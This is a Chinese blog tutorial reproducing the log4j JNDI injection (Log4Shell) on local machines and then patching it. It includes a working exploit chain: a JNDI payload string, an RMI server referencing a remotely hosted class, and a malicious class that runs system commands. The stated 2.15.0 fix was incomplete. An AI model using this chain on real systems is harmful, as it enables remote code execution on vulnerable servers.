亲测log4j 漏洞复现与修复

声明:

注:本文仅供参考学习,不构成任何犯罪引导

说明:

log4j未对字符合法性进行严格的限制,执行了恶意脚本。比如:
${jndi:rmi://127.0.0.1:1099/attack}这个东西可以通过rest接口参数传进来,进行恶意注入。比如:http://xxx:81/track/user?id=1&name=${jndi:rmi://127.0.0.1:1099/attack},进入你的代码中后如果你接收了name参数之后使用log.info("userName:", name);就中招了。
受影响的范围为Apache Log4j 2.x <= 2.14.1

原理:

image.png

JDK版本:

image.png

这里为什么要介绍jdk版本呢?我这里181版本只需要设置System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");就可以被攻击。如果大于等于191版本设置不同,甚至你后面的注入触发不了。
有兴趣的可以看:
如何绕过高版本JDK的限制进行JNDI注入利用
攻击Java中的JNDI、RMI、LDAP(二)

准备:

  • 被攻击者:
    一个正常的springboot web应用,使用了log4j-2.11.1(含漏洞版本)。我这里叫track,下面会讲。
  • 攻击者:
  1. 搭建一个rmi服务;
  2. 启动一个nginx,里面放一个含恶意脚本的class文件。

攻击者:

rmi服务:

项目结构:


image.png

AttackService.java务必放在classpath根路径下编译成class文件。我这里就是在src/main/java/AttackService.java,运行启动类编译class文件在target/classes/AttackService.class,这个class文件等会要拷贝到nginx下用。

RmiServerRun 启动类:

package com.rmi;

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RmiServerRun {

    public static void main(String[] args) {
        Registry registry = null;
        try {
            registry = LocateRegistry.createRegistry(1099);
            // 远程连接到nginx http://127.0.0.1:80/AttackService.class 执行该脚本
            Reference reference = new Reference("AttackService",
                    "AttackService", "http://127.0.0.1:80/");
            ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
            registry.bind("attack", referenceWrapper);
            System.out.println("黑客rmi服务端启动成功!");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

AttackService 恶意脚本类:

import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.io.IOException;
import java.util.Hashtable;

public class AttackService implements ObjectFactory {

    {
        System.out.println("代码块:攻击服务器!");
        Runtime.getRuntime().exec("calc.exe");
    }

    static {
        System.out.println("静态代码块:攻击服务器!");
        try {
            Runtime.getRuntime().exec("notepad.exe");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    public AttackService() throws IOException {
        System.out.println("构造函数:攻击服务器!");
        Runtime.getRuntime().exec("calc.exe");
    }

    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
        System.out.println("getObjectInstance:攻击服务器!");
        Runtime.getRuntime().exec("calc.exe");
        return null;
    }
}

启动RmiServerRun :


image.png
nginx:

把上一步中target/classes/AttackService.class编译好的class文件放到nginx下

image.png

启动nginx
测试访问:http://127.0.0.1:80/AttackService.class 可以下载到文件即通。

被攻击者的服务(track)

项目是个很简单的web应用,如图:


image.png

使用了含漏洞的log4j版本,如图:


image.png

AppTrack.java启动类:
package com.hongyi.cms;

import lombok.extern.slf4j.Slf4j;
import org.mybatis.spring.annotation.MapperScan;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;

@SpringBootApplication
@MapperScan({"com.hongyi.cms.track.mapper"})
@Slf4j
public class AppTrack {

    public static void main(String[] args) {

        SpringApplication.run(AppTrack.class);

        System.out.println("==>web start");
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
//        System.setProperty("com.sun.jndi.cosnaming.object.trustURLCodebase", "true");
//        System.setProperty("java.rmi.server.useCodebaseOnly", "false");
        log.info("${jndi:rmi://192.168.18.103:1099/attack}");
//        log.info("${java:os}");

//        InitialContext initial = new InitialContext();
//        Object lookup = initial.lookup("rmi://127.0.0.1:1099/attack");
        System.out.println("==>web end");
    }

}

这个启动类是模拟正常rest接口接收到注入参数,然后执行的过程。
启动AppTrack.java后:

image.png

会弹出来记事本和计算器。。被攻击成功。。。
不成功案例:
只是打印了Reference Class Name: AttackService,如图:
image.png

远程类没有成功加载过来,检查rmi服务 factoryLocation 参数路径最后是不是少个斜线?如图:
image.png

检查nginx启动成功了吗?
检查jdk版本是不是高于1.8.0_191了?

log4j漏洞修复方式:

pom.xml中升级log4j的版本到2.15.0

<properties>
        <log4j2.version>2.15.0</log4j2.version>
</properties>

<dependencies>
    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-web</artifactId>
    </dependency>
    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter</artifactId>
        <exclusions>
            <exclusion>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-starter-logging</artifactId>
            </exclusion>
        </exclusions>
    </dependency>
    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-log4j2</artifactId>
    </dependency>
<dependencies>

解决参照官方:
Upgrade to Log4j2 2.15.0 · Issue #28983 · spring-projects/spring-boot · GitHub
Log4J2 Vulnerability and Spring Boot

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 212,222评论 6 493
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,455评论 3 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 157,720评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,568评论 1 284
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,696评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,879评论 1 290
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,028评论 3 409
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,773评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,220评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,550评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,697评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,360评论 4 332
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,002评论 3 315
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,782评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,010评论 1 266
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,433评论 2 360
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,587评论 2 350

推荐阅读更多精彩内容